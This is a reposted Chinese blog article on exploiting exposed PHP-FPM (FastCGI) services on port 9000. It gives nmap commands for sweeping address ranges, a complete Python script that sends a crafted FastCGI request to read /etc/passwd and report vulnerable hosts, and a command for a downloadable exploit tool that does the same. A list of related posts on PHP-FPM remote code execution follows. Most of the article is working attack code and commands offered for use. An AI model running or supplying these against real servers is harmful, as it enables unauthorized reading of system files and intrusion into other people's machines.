FPM的远程利用

最新推荐文章于 2024-07-25 17:27:32 发布
最新推荐文章于 2024-07-25 17:27:32 发布
阅读量116 收藏
点赞数
文章标签: 网络 php 运维
原文链接:http://www.cnblogs.com/sevck/p/4983051.html
版权

 看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:

原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/

http://zone.wooyun.org/content/1060

 

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。  

可以用nmap来进行扫描一下:

nmap -sV -p 9000 --open x.x.x.x/24

检查出来的是存在9000端口开放的主机

接着用nmap来指纹识别一下:

nmap -sV -p 9000 --open 173.xxx.xxx.1/24

结果如下:

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24 

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT 
Nmap scan report for abc.net (173.xxx.xxx.111) 
Host is up (0.0095s latency). 
PORT     STATE SERVICE VERSION 
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0) 
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel 

Nmap scan report for abc.com (173.xxx.xxx.183) 
Host is up (0.0096s latency). 
PORT     STATE SERVICE    VERSION 
9000/tcp open  tcpwrapped 

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

 

如果是对于内网的话可以用lijiejie写的py:

 1 import socket
 2 import sys
 3 
 4 def test_fastcgi(ip):
 5     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
 6     sock.connect((ip, 9000))
 7     data = """
 8     01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
 9     01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
10     54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
11     56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
12     2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
13     4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
14     52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
15     50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
16     70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
17     4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
18     63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
19     """
20     data_s = ''
21     for _ in data.split():
22         data_s += chr(int(_,16))
23     sock.send(data_s)
24     try:
25         ret = sock.recv(1024)
26         if ret.find(':root:') > 0:
27             print ret
28             print '%s is vulnerable!' % ip
29             return True
30         else:
31             return False
32     except Exception, e:
33         pass
34             
35     sock.close()
36 
37 
38 if __name__ == '__main__':
39     if len(sys.argv) == 1:
40         print sys.argv[0], '[ip]'
41     else:
42         test_fastcgi(sys.argv[1])

 然后就可以用:

fcgi_exp.exe read XXX.XXX.XXX.XXX 9000 /etc/passwd

EXP:http://www.lijiejie.com/wp-content/uploads/2015/06/fcgi_exp.zip

 

转载于:https://www.cnblogs.com/sevck/p/4983051.html

angaoux03775
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-FPM 远程代码执行漏洞
锋刃科技的博客
05-21 2127
漏洞简介 国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现, 向目标服务器 URL 发送 %0a 符号时, 服务返回异常, 疑似存在漏洞 2019年10月23日, github公开漏洞相关的详情以及exp.当nginx配置不当时, 会导致php-fpm远程任意代码执行 影响组件 Nginx + FPM + PHP7 漏洞指纹 Nginx PHP Nextcloud 漏洞分析 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location
PHP-CGI远程代码执行漏洞分析与防范
12-20
对于CGI模式,应尽量避免使用,优先考虑使用更安全的FastCGI(如PHP-FPM)。此外,配置Web服务器以限制对CGI脚本的访问,如仅允许特定的脚本执行,或者使用更严格的输入验证和过滤机制,防止恶意的查询字符串被误...
PHP FastCGI远程利用
cnbird's blog
09-17 1158
说到FastCGI,大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式,甚至有的类型脚本这是唯一的模式(ROR,Python等)。  FastCGI的主要目的就是,将webserver和动态语言的执行分开为两个不同的常驻进程,当webserver接收到动态脚本的请求,就通过fcgi协议将请求通过网络转发给fcgi进程,由fcgi进程进行
php-fpm远程使用,Nginx的PHP-FPM远程代码执行 漏洞复现
weixin_39616477的博客
03-19 213
在9月14日至18举办的RealWorldCTF中,国外安全研究员AndrewDanau在解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常,疑似存在漏洞。Nginx上fastcgi_split_path_info在处理带有%0a的请求时,会因为遇到换行符\n导致PATH_INFO为空。而php-fpm在处理PAT...
nginx远程php,PHP-FPM Nginx - 远程命令执行
weixin_28878287的博客
03-09 359
介是php-fpm (CVE-2019-11043)的一个漏洞利用,在某种配置下,nginx+php-fpm的框架里,这个漏洞可以由外界触发。这就意味着,一个网页用户可能对这种配置的服务器实施远程命令执行攻击。(有前提条件,看下文)###这是啥漏洞如果一个网站服务器运行着nginx+php-fpm,然后还有类似下面的配置:location ~ [^/]\.php(/|$) {...fastcgi_...
深入理解PHP远程多会话调试
12-20
本文将详细介绍如何利用Xdebug实现PHP远程多会话调试,以提高开发效率。 **一、解决的问题和适用场景** 1. **解决什么问题**:在同一个开发环境中,例如www.mysite.com项目调用了api.mysite.com项目的服务,当在...
[好文]mod_php和mod_fastcgiphp-fpm的介绍,对比,和性能数据.pdf
11-26
3. 远程方式:Apache通过网络远程服务器上的FastCGI进程进行通信,这样可以实现服务器集群的负载均衡。 PHP-FPM(FastCGI Process Manager)是PHP的一个扩展,专门用于管理FastCGI进程。它提供了一个更高效的进程...
(完整版)[好文]mod-php和mod-fastcgiphp-fpm的介绍-对比-和性能数据.doc
10-23
3. 远程方式:Apache 不直接管理 PHP FastCGI 进程,而是通过网络连接到其他机器上的 FastCGI 服务,实现 PHP 处理的分布式部署。 PHP-FPM (FastCGI Process Manager) PHP-FPMPHP FastCGI 的现代管理和调度器,...
ansible-role-php:Ansible角色-PHP
01-31
Ansible是一款强大的自动化运维工具,它通过简洁的YAML语法实现服务器配置、应用部署和任务执行。...对于开发团队和系统管理员来说,利用Ansible的角色特性可以极大地提高工作效率,降低维护成本。
MarkTool之TCP服务端
Qt学视觉
07-24 222
MarkTool之TCP服务端
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 797
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
某企业网络及服务器规划与设计
cj13106811623的博客
07-22 1040
在此次系统设计中,我们采用分层设计方法,将网络的逻辑结构化整为零,分层讨论设计与实现的细节问题。将网络拓扑结构划分为3个层次,即核心层、汇聚层和接入层。
网络编程套接字socket
安权_code的博客
07-23 904
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 891
DNS概述。
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 1080
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
通信原理-思科实验五:家庭终端以太网接入Internet实验
sinat_39522506的博客
07-24 274
实验五 家庭终端以太网接入Internet实验。接着配置IP地址池和虚拟模板 开启宽带拨号。1.按照上图选择对应的设备,并连接起来。5.为路由器R1配置静态路由项。7.完成终端PC2 IP配置。
如何保护你的网络安全?
m0_70655343的博客
07-15 1066
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
Hyperledger Fabric 网络体验 - 网络启动过程概览
最新发布
ALONG的博客
07-25 273
作为第一次Fabric网络体验,网络启动主要包含三个操作,分别是生成配置文件、启动网络和操作网络。执行完指令能看到fabric已经启动。
SAP FPM for Web Dynpro ABAP基础教程
在使用 FPM 开发时,开发者需要注意的是,尽管 FPM 提供了丰富的预定义元素,但仍然需要对 Web Dynpro ABAP 有深入的理解,以便正确配置这些元素并处理复杂的业务逻辑。同时,由于 FPM 是基于 SAP NetWeaver 平台,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值